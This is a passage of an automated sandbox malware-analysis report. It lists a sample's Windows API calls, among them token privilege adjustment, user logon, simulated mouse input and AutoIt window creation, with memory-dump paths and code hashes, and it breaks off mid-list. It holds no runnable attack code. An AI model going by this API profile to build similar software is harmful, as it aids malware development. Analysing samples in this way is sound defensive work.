                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                  • String ID:
                                                                  • API String ID: 3429775523-0
                                                                  • Opcode ID: c59743ce473897e3db4bde33b5e85d44775c210a9fb4afce102ee2b7dcf11e08
                                                                  • Instruction ID: fd526a0f80dcb413c6a9bed4cc9f54b4e8643870e6ece6bd80c3e919e431dcfa
                                                                  • Opcode Fuzzy Hash: c59743ce473897e3db4bde33b5e85d44775c210a9fb4afce102ee2b7dcf11e08
                                                                  • Instruction Fuzzy Hash: ACF04976A5530CBFDF00DFF4DC99EAEBBBCEF08301F1044A9A905E2281E6716A449B50
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0095C6FB
                                                                  • FindClose.KERNEL32(00000000), ref: 0095C72B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Find$CloseFileFirst
                                                                  • String ID:
                                                                  • API String ID: 2295610775-0
                                                                  • Opcode ID: 888279cfedfe66faee8f38bec63310142f8d241a2807b73635cfe6fa51e46b87
                                                                  • Instruction ID: 5016260cb75dda178ebfea2526527e0f606744ee1e905c055a23f057e203cea5
                                                                  • Opcode Fuzzy Hash: 888279cfedfe66faee8f38bec63310142f8d241a2807b73635cfe6fa51e46b87
                                                                  • Instruction Fuzzy Hash: BA11A1726146049FDB10DF29C845A2AF7E8FF89361F00852EF9A9D7291DB30AC05CF81
                                                                  APIs
                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00969468,?,0097FB84,?), ref: 0095A097
                                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00969468,?,0097FB84,?), ref: 0095A0A9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFormatLastMessage
                                                                  • String ID:
                                                                  • API String ID: 3479602957-0
                                                                  • Opcode ID: 2dfeaa84f71a8d19138de2b2359209aff5ce85216c1e89afb745f1513832104c
                                                                  • Instruction ID: 402a0d01c33b94d0fa6d87cea4faa4ea8803cc63f8203e4ab657f0cd2ac2e000
                                                                  • Opcode Fuzzy Hash: 2dfeaa84f71a8d19138de2b2359209aff5ce85216c1e89afb745f1513832104c
                                                                  • Instruction Fuzzy Hash: 07F0E23511422DABDB20AFA4DC48FFA736CFF09361F004265F908D6181C6309944CBA1
                                                                  APIs
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00948309), ref: 009481E0
                                                                  • CloseHandle.KERNEL32(?,?,00948309), ref: 009481F2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                  • String ID:
                                                                  • API String ID: 81990902-0
                                                                  • Opcode ID: 710ff10d636f2071bf0ba55d32572f489cb9a1b756a8ad0b378c30d4500ff145
                                                                  • Instruction ID: 6a771293e0e1ebafd36eb9768b23b13f7f501a670079d652584faecf6ff03f87
                                                                  • Opcode Fuzzy Hash: 710ff10d636f2071bf0ba55d32572f489cb9a1b756a8ad0b378c30d4500ff145
                                                                  • Instruction Fuzzy Hash: 2EE0EC72014614AFE7252B71EC09EB77BEEEF44350714882DF8AA94470DB62ACE1EB10
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00918D57,?,?,?,00000001), ref: 0091A15A
                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0091A163
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: 19cfdc59cd66add5c127d58297599a72ac26a3ea1d9ba4abf63abc1a9b75a5d9
                                                                  • Instruction ID: 8321f630e1b1e3795cba71e68c3e5272a3ca9eb4e0f06c051954bed0dce0b96c
                                                                  • Opcode Fuzzy Hash: 19cfdc59cd66add5c127d58297599a72ac26a3ea1d9ba4abf63abc1a9b75a5d9
                                                                  • Instruction Fuzzy Hash: F0B09232068208ABCA006B91EC19B883F68EB44BEAF404020F60D94060CB625490AA91
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d53b05c1dc35ba510cc6ca975293b41561a5ca916c52097207cdb5c5a8b570d7
                                                                  • Instruction ID: fb454ab4f1a905a3516f3435399c4d52bc3defcdd13266003b748f771b0fc2c6
                                                                  • Opcode Fuzzy Hash: d53b05c1dc35ba510cc6ca975293b41561a5ca916c52097207cdb5c5a8b570d7
                                                                  • Instruction Fuzzy Hash: 0132D631E29F094DD7239634D8723759249AFB73D4F25D737E82AB5AA6EB28C4C35200
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 046fdac888eef55d2be4a24c500e83af334be2d6c806c74e9d1e9bf14996f7ef
                                                                  • Instruction ID: c00d4722332df9750bb7c3ad7c9ff01c53ff2485967ab065563e434bd4039c5e
                                                                  • Opcode Fuzzy Hash: 046fdac888eef55d2be4a24c500e83af334be2d6c806c74e9d1e9bf14996f7ef
                                                                  • Instruction Fuzzy Hash: E9B1ED30E3AF514DE72396399831336BA5CAFBB2C5B51D71BFC2670E26EB2185835241
                                                                  APIs
                                                                  • __time64.LIBCMT ref: 0095889B
                                                                    • Part of subcall function 0091520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00958F6E,00000000,?,?,?,?,0095911F,00000000,?), ref: 00915213
                                                                    • Part of subcall function 0091520A: __aulldiv.LIBCMT ref: 00915233
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Time$FileSystem__aulldiv__time64
                                                                  • String ID:
                                                                  • API String ID: 2893107130-0
                                                                  • Opcode ID: 6562f12dfa882d0236b290b0231366dedf365962c3c66c52b8e80d549eae9b0d
                                                                  • Instruction ID: 1d37e5393ae54c3304fee68dbc92181a1fe58a5d1929554241cd3c1314dd40ee
                                                                  • Opcode Fuzzy Hash: 6562f12dfa882d0236b290b0231366dedf365962c3c66c52b8e80d549eae9b0d
                                                                  • Instruction Fuzzy Hash: 2F21E432635610CBC329CF29D841A52B3E5EFA4321B288F2CE5F5CB2C0CA74B905DB54
                                                                  APIs
                                                                  • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00954C4A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: mouse_event
                                                                  • String ID:
                                                                  • API String ID: 2434400541-0
                                                                  • Opcode ID: feadabc40c143ffdc1cefe0095fd2687c340106a4cfc5a1be8d5ee9bdf505023
                                                                  • Instruction ID: 32c651264767c93708dc2ad965f4569c6e3d6bf2caaf382faf43e24b2e878862
                                                                  • Opcode Fuzzy Hash: feadabc40c143ffdc1cefe0095fd2687c340106a4cfc5a1be8d5ee9bdf505023
                                                                  • Instruction Fuzzy Hash: DAD017A116520928E89CC722DA1FFBA1108E38078BFD08549B9828A0C1A8849CC86630
                                                                  APIs
                                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00948389), ref: 009487D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: LogonUser
                                                                  • String ID:
                                                                  • API String ID: 1244722697-0
                                                                  • Opcode ID: cc4a8b4acc5f65de3ba34be3c76e7aac2d1ddda239f2b25284662c0e38783a30
                                                                  • Instruction ID: eef72eb5b101a8e07fe8ee1269314bb5d3c7834cac4c491fbd5bc3d49e8f8a99
                                                                  • Opcode Fuzzy Hash: cc4a8b4acc5f65de3ba34be3c76e7aac2d1ddda239f2b25284662c0e38783a30
                                                                  • Instruction Fuzzy Hash: A4D05E3326450EABEF018EA4DC01EAE3B69EB04B01F408111FE15D61A1C775D835AB60
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0091A12A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: bdb959f8cc0dbc583ef048c8521607b5ac2be44bf468acfea6b378c9b7cf9898
                                                                  • Instruction ID: 9806aefb819eda8ee0682668fad65160414621140c47b7ae635ebe44f484a30c
                                                                  • Opcode Fuzzy Hash: bdb959f8cc0dbc583ef048c8521607b5ac2be44bf468acfea6b378c9b7cf9898
                                                                  • Instruction Fuzzy Hash: E6A0123101410CA78A001B41EC044447F5CD7002D47004020F40C40021873254505980
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e0c95242f5b7258f264e748068498fe71f51fc34266003e345718e4fbf0b3991
                                                                  • Instruction ID: b10a4f557e285d8e0f9fbbc884f42da61ccaabbefc32b7df48fab21c6150b264
                                                                  • Opcode Fuzzy Hash: e0c95242f5b7258f264e748068498fe71f51fc34266003e345718e4fbf0b3991
                                                                  • Instruction Fuzzy Hash: 54223330708516CFCF28CA64C494B7E77E9BF41304F29886BD9E68A9D3DB749D91CA41
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                  • Instruction ID: a40f465e321dfb4eb57a748344b59bb083d5246524fac52ec6b14d601ee59e91
                                                                  • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                  • Instruction Fuzzy Hash: 5CC1E6363090970ADF2D573994750BEFBA55EA27B131A076EE4B3CB0D4EE20C9B5D620
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                  • Instruction ID: 3273b54ae95899ed11794db1aedcfb8658509f3fc364a64fc2aa2c32d3ed575d
                                                                  • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                  • Instruction Fuzzy Hash: 92C1B2363051970ADF2D573AD4350BEBAA55FA27B131A07AED4B3DB0D4EE20C9B4D620
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                  • Instruction ID: fc1b414edabf9788249f0d69851cae68e945896ce10a58af5a8c25c61fa77b9b
                                                                  • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                  • Instruction Fuzzy Hash: D2C1C6363090971ADF2D463AD4350BEFBA55EA27B131A076ED9B3CB1C4EE10C9B5D620
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                  • Instruction ID: 74fad753d93943cf93b4d501db346dd4f298f16a99e7e15aafd772234c718277
                                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                  • Instruction Fuzzy Hash: 2FC1C23630909719DF2D463AE4351BEFBA55EA27B131A076ED5B3CB1C4EE20C9A4C660
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1285208597.0000000001412000.00000040.00000020.00020000.00000000.sdmp, Offset: 01412000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1412000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                  • Instruction ID: 466b204657dab7ec59a33c378ffd6d5fa96b5ebf9c6a46bca71fcc0afb93136f
                                                                  • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                  • Instruction Fuzzy Hash: DD41D371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB40
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1285208597.0000000001412000.00000040.00000020.00020000.00000000.sdmp, Offset: 01412000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1412000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                  • Instruction ID: deae007e37ab5aae100be641e2be2ede0cf07fa5ea4e56df959c46cbb9e05f7f
                                                                  • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                  • Instruction Fuzzy Hash: 52019278A00209EFCB44DF99C5909AEF7B5FB88310F20869AD809A7315D730EE42DB80
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1285208597.0000000001412000.00000040.00000020.00020000.00000000.sdmp, Offset: 01412000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1412000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                  • Instruction ID: e34b33c8cc352c5d64560743c192be1d07111dc9ba5aabf926800132f011fa5c
                                                                  • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                  • Instruction Fuzzy Hash: 65019278A00209EFCB44DF98C5909AEF7B5FB48310F20859ADC19A7315E730EE42DB80
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1285208597.0000000001412000.00000040.00000020.00020000.00000000.sdmp, Offset: 01412000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1412000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                  • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                  • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                  • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                  APIs
                                                                  • DeleteObject.GDI32(00000000), ref: 0096785B
                                                                  • DeleteObject.GDI32(00000000), ref: 0096786D
                                                                  • DestroyWindow.USER32 ref: 0096787B
                                                                  • GetDesktopWindow.USER32 ref: 00967895
                                                                  • GetWindowRect.USER32(00000000), ref: 0096789C
                                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 009679DD
                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 009679ED
                                                                  • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00967A35
                                                                  • GetClientRect.USER32(00000000,?), ref: 00967A41
                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00967A7B
                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00967A9D
                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00967AB0
                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00967ABB
                                                                  • GlobalLock.KERNEL32(00000000), ref: 00967AC4
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00967AD3
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00967ADC
                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00967AE3
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00967AEE
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00967B00
                                                                  • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00982CAC,00000000), ref: 00967B16
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00967B26
                                                                  • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00967B4C
                                                                  • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00967B6B
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00967B8D
                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00967D7A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
